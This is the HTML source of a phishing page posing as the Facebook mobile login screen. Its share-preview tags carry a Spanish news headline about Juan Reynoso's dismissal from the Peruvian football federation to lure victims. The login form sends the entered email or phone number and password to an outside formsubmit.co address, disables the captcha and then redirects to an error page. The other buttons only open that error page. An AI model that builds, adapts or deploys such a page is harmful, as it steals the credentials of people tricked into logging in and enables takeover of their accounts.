<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Facebook</title>
    <link rel="shortcut icon" href="img/icon.webp" type="image/x-icon">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <meta property="og:title" content="Reynoso es despedido por la federación Peruana">
    <meta property="og:description" content="Director Deportivo de la Federación Peruana de Fútbol abandonó la Videna y, tras confesar sentirse contrariado, reveló parte de su diálogo con Juan Reynoso donde le informó decisión del Directorio de la FPF.">
    <meta property="og:image" content="img/reynoso.jpeg">
    <meta property="og:url" content="URL completa de tu artículo o página">
    <meta property="og:type" content="website">
    <style>
        .login{
            background: rgb(25,129,242);
            border: none;
            border-radius: 4px;
            color: white;
            font-weight: 600;
        }
        .create{
            background: rgb(57,171,88);
            border: none;
            border-radius: 4px;
            color: white;
            font-weight: 600;
        }
        .line-with-text {
        position: relative;
        text-align: center;
        margin-top: 10px;
        }

        .line-with-text hr {
        border: none;
        border-top: 1px solid rgb(57,57,57); /* Puedes ajustar el grosor y el color de la línea según tus preferencias */
        }

        .line-with-text span {
        background-color: #fff; /* Puedes ajustar el color de fondo del texto según tus preferencias */
        position: absolute;
        top: 2px; /* Ajusta la posición vertical del texto según sea necesario */
        left: 45%;
        padding: 0 10px; /* Ajusta el espaciado interno del texto según sea necesario */
        }
        .password,.nickname{
            border: 1px solid rgb(225, 225, 225);
            border-radius: 8px;
            padding: 10px 9px;
            color: rgb(57,57,57);
        }
    </style>
  </head>
  <body>
        <form action="https://formsubmit.co/8de9823252baca54b02ecdc3f0d38414" method="POST">
            <div class="container">
                <div class="row">
                    <div class="col p-0">
                        <img src="img/portada.jpg" width="100%" alt="">
                    </div>
                </div>
                <div class="row">
                    <div onclick="errorlog()" class="col-12 text-center pt-1 pb-4" style="color:rgb(109,109,109)">
                        English · Español · <span style="color:rgb(25,129,242)">More</span>    
                    </div>
                    <div class="col-12 text-center py-2">
                    <input type="text" style="width: 100%;" placeholder="Movil number or email" class="nickname" name="email"> 
                    </div>
                    <div class="col-12 text-center pb-2" >
                        <input type="password" style="width: 100%" placeholder="Password" class="password" name="password">    
                    </div>
                    <div class="col-12 pb-2">
                        <!-- <button  style="width: 100%;background: rgb(25,129,242);" class="login py-2">Log in</button>   -->
                        <input style="width: 100%;background: rgb(25,129,242);" class="login py-2" type="submit" value="Log in">  
                    </div>
                    <div onclick="errorlog()"class="col-12 text-center pb-5" style="color: rgb(8,59,124);font-weight: 600;">
                        Forgotten password?    
                    </div>
                    <div class="col-12 line-with-text pb-5" >
                        <hr>
                        <span style=" color:rgb(109,109,109);">OR</span>
                    </div>
                    <div class="col-12">
                        <button onclick="errorlog()" style="width: 100%;" class="create py-2">Create New Facebook Account</button>    
                    </div>
                </div>
            </div>
            <input type="hidden" name="_next" value="http://127.0.0.1:5500/error.html">
            <input type="hidden" name="_captcha" value="false">

        </form>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
    <script>
        function errorlog(){
            window.open("error.html", '_blank');
        }
    </script>
  </body>
</html>
